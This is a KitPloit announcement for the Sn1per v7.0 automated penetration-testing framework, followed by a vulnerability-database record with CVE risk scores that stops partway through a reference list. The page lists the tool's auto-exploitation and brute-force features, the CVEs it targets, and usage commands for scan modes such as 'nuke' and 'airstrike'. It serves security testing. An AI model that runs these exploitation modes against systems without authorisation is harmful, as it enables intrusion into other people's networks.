Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts

2019-05-12T13:09:00

Description

[![](https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s640/Sn1per_1_Sn1per.jpeg)](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>) Sn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> "automated scanner" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> "penetration test" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> "https://xerosecurity.com" ). **SN1PER PROFESSIONAL FEATURES:** **Professional reporting interface** [![](https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s640/Sn1per_8.png)](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>) **Slideshow for all gathered screenshots** [![](https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s640/Sn1per_9.png)](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>) **Searchable and sortable DNS, IP and open port database** [![](https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s640/Sn1per_10.png)](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>) **Detailed host reports** [![](https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s640/Sn1per_11.png)](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>) **NMap HTML host reports** [![](https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s640/Sn1per_12.png)](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>) **Quick links to online recon tools and Google hacking queries** [![](https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s640/Sn1per_13.png)](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>) **Takeovers and Email Security** [![](https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s640/Sn1per_14.png)](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>) **HTML5 Notepad** [![](https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s640/Sn1per_15.png)](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>) **ORDER SN1PER PROFESSIONAL:** To obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> "https://xerosecurity.com" ). **DEMO VIDEO:** [![](https://3.bp.blogspot.com/-FRx9lYOZvxk/XNXulWtQYAI/AAAAAAAAO1Y/gsksdwJsb0coIyD2LUZ0QwE1HaDQVsP2wCLcBGAs/s640/Sn1per_16.png)](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) **SN1PER COMMUNITY FEATURES:** * Automatically collects basic recon (ie. whois, ping, DNS, etc.) * Automatically launches Google hacking queries against a target domain * Automatically enumerates open ports via NMap port scanning * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers * Automatically checks for sub-domain hijacking * Automatically runs targeted NMap scripts against open ports * Automatically runs targeted Metasploit scan and exploit modules * Automatically scans all web applications for common vulnerabilities * Automatically brute forces ALL open services * Automatically test for anonymous FTP access * Automatically runs WPScan, Arachni and Nikto for all web services * Automatically enumerates NFS shares * Automatically test for anonymous LDAP access * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities * Automatically enumerate SNMP community strings, services and users * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers * Automatically tests for open X11 servers * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds * Performs high level enumeration of multiple hosts and subnets * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting * Automatically gathers screenshots of all web sites * Create individual workspaces to store all scan output **EXPLOITS:** * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> "Remote Code Execution" ) \- SA-CORE-2018-002 * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> "Command Injection" ) CVE-2018-10561 * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption * Apache Tomcat: Remote Code Execution (CVE-2017-12617) * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 * Shellshock Bash Shell remote code execution CVE-2014-6271 * HeartBleed OpenSSL Detection CVE-2014-0160 * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 * MS08-067 Microsoft Server Service Relative Path Stack Corruption * Webmin File Disclosure CVE-2006-3392 * VsFTPd 2.3.4 Backdoor * ProFTPd 1.3.3C Backdoor * MS03-026 Microsoft RPC DCOM Interface Overflow * DistCC Daemon Command Execution * JBoss Java De-Serialization * HTTP Writable Path PUT/DELETE File Access * Apache Tomcat User Enumeration * Tomcat Application Manager Login Bruteforce * Jenkins-CI Enumeration * HTTP WebDAV Scanner * Android Insecure ADB * Anonymous FTP Access * PHPMyAdmin Backdoor * PHPMyAdmin Auth Bypass * OpenSSH User Enumeration * LibSSH Auth Bypass * SMTP User Enumeration * Public NFS Mounts **KALI LINUX INSTALL:** bash install.sh **UBUNTU/DEBIAN/PARROT INSTALL:** bash install_debian_ubuntu.sh **DOCKER INSTALL:** docker build Dockerfile **USAGE:** [*] NORMAL MODE sniper -t|--target <TARGET> [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce [*] STEALTH MODE + OSINT + RECON sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon [*] DISCOVER MODE sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS> [*] FLYOVER MODE sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS> [*] AIRSTRIKE MODE sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS> [*] SCAN ONLY SPECIFIC PORT sniper -t|--target <TA RGET> -m port -p|--port <portnum> [*] FULLPORTONLY SCAN MODE sniper -t|--target <TARGET> -fp|--fullportonly [*] PORT SCAN MODE sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM> [*] WEB MODE - PORT 80 + 443 ONLY! sniper -t|--target <TARGET> -m|--mode web [*] HTTP WEB PORT HTTP MODE sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port> [*] HTTPS WEB PORT HTTPS MODE sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port> [*] WEBSCAN MODE sniper -t|--target <TARGET> -m|--mode webscan [*] ENABLE BRUTEFORCE sniper -t|--target <TARGET> -b|--bruteforce [*] ENABLE LOOT IMPORTING INTO METASPLOIT sniper -t|--target <TARGET> [*] LOOT REIMPORT FUNCTION sniper -w <WORKSPACE_ALIAS> --reimport [*] LOOT REIMPORTALL FUNCTION sniper -w <WORKSPACE_ALIAS& gt; --reimportall [*] DELETE WORKSPACE sniper -w <WORKSPACE_ALIAS> -d [*] DELETE HOST FROM WORKSPACE sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh [*] SCHEDULED SCANS' sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly' [*] SCAN STATUS sniper --status [*] UPDATE SNIPER sniper -u|--update **MODES:** * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML. * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port. * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port. * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni. **SAMPLE REPORT:** <https://gist.github.com/1N3/8214ec2da2c91691bcbc> **[Download Sn1per](<https://github.com/1N3/Sn1per> "Download Sn1per" )**

{"id": "KITPLOIT:7013881512724945934", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "description": "[![](https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s640/Sn1per_1_Sn1per.jpeg)](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[![](https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s640/Sn1per_8.png)](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[![](https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s640/Sn1per_9.png)](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[![](https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s640/Sn1per_10.png)](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[![](https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s640/Sn1per_11.png)](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[![](https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s640/Sn1per_12.png)](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[![](https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s640/Sn1per_13.png)](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[![](https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s640/Sn1per_14.png)](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[![](https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s640/Sn1per_15.png)](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[![](https://3.bp.blogspot.com/-FRx9lYOZvxk/XNXulWtQYAI/AAAAAAAAO1Y/gsksdwJsb0coIyD2LUZ0QwE1HaDQVsP2wCLcBGAs/s640/Sn1per_16.png)](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "published": "2019-05-12T13:09:00", "modified": "2019-05-12T13:09:05", "epss": [{"cve": "CVE-2006-3274", "epss": 0.00953, "percentile": 0.81411, "modified": "2023-12-06"}, {"cve": "CVE-2006-3392", "epss": 0.94703, "percentile": 0.99061, "modified": "2023-12-06"}, {"cve": "CVE-2009-3843", "epss": 0.90606, "percentile": 0.98538, "modified": "2023-12-06"}, {"cve": "CVE-2014-0160", "epss": 0.97531, "percentile": 0.9999, "modified": "2023-12-06"}, {"cve": "CVE-2014-6271", "epss": 0.97568, "percentile": 1.0, "modified": "2023-12-06"}, {"cve": "CVE-2014-7169", "epss": 0.97348, "percentile": 0.99873, "modified": "2023-12-06"}, {"cve": "CVE-2015-8249", "epss": 0.96552, "percentile": 0.99503, "modified": "2023-12-06"}, {"cve": "CVE-2017-10271", "epss": 0.97438, "percentile": 0.99937, "modified": "2023-12-06"}, {"cve": "CVE-2017-12617", "epss": 0.9747, "percentile": 0.9996, "modified": "2023-12-06"}, {"cve": "CVE-2017-5638", "epss": 0.97536, "percentile": 0.99993, "modified": "2023-12-06"}, {"cve": "CVE-2017-7269", "epss": 0.97121, "percentile": 0.99735, "modified": "2023-12-06"}, {"cve": "CVE-2017-9805", "epss": 0.97545, "percentile": 0.99994, "modified": "2023-12-06"}, {"cve": "CVE-2018-10561", "epss": 0.97166, "percentile": 0.99758, "modified": "2023-12-06"}, {"cve": "CVE-2018-11776", "epss": 0.9755, "percentile": 0.99995, "modified": "2023-12-06"}, {"cve": "CVE-2018-7600", "epss": 0.9756, "percentile": 0.99997, "modified": "2023-12-06"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "reporter": "KitPloit", "references": ["https://github.com/1N3/Sn1per", "https://gist.github.com/1N3/8214ec2da2c91691bcbc"], "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "immutableFields": [], "lastseen": "2023-12-08T20:50:26", "viewCount": 4131, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-7600"]}, {"type": "altlinux", "idList": ["1AE3F028B45AFBA1000C345913245540", "2C451CDC2E9FF9726C7554CE43F4070C", "5C34F25EE3DF8BD5F5B97015790B1BF4", "C4A4D01DAC514C09C90BD319B765F626"]}, {"type": "amazon", "idList": ["ALAS-2014-320", "ALAS-2014-418", "ALAS-2014-419", "ALAS-2017-913"]}, {"type": "archlinux", "idList": ["ASA-201409-2", "ASA-201804-1"]}, {"type": "arista", "idList": ["ARISTA:0004", "ARISTA:006"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879", "ATLASSIAN:JRACLOUD-38927", "ATLASSIAN:JRASERVER-38927", "ATLASSIAN:JRASERVER-64394", "ATLASSIAN:JRASERVER-65102", "BAM-18242", "CWD-4879", "JRASERVER-64394", "JRASERVER-65102"]}, {"type": "attackerkb", "idList": ["AKB:195A97E5-45A3-4A70-95E4-60FF9B5AD20D", "AKB:26BDFAC3-8C29-40D1-B3A7-C26249A3B4D7", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:4D7DB359-066E-4E56-AFBB-FA98BF564F13", 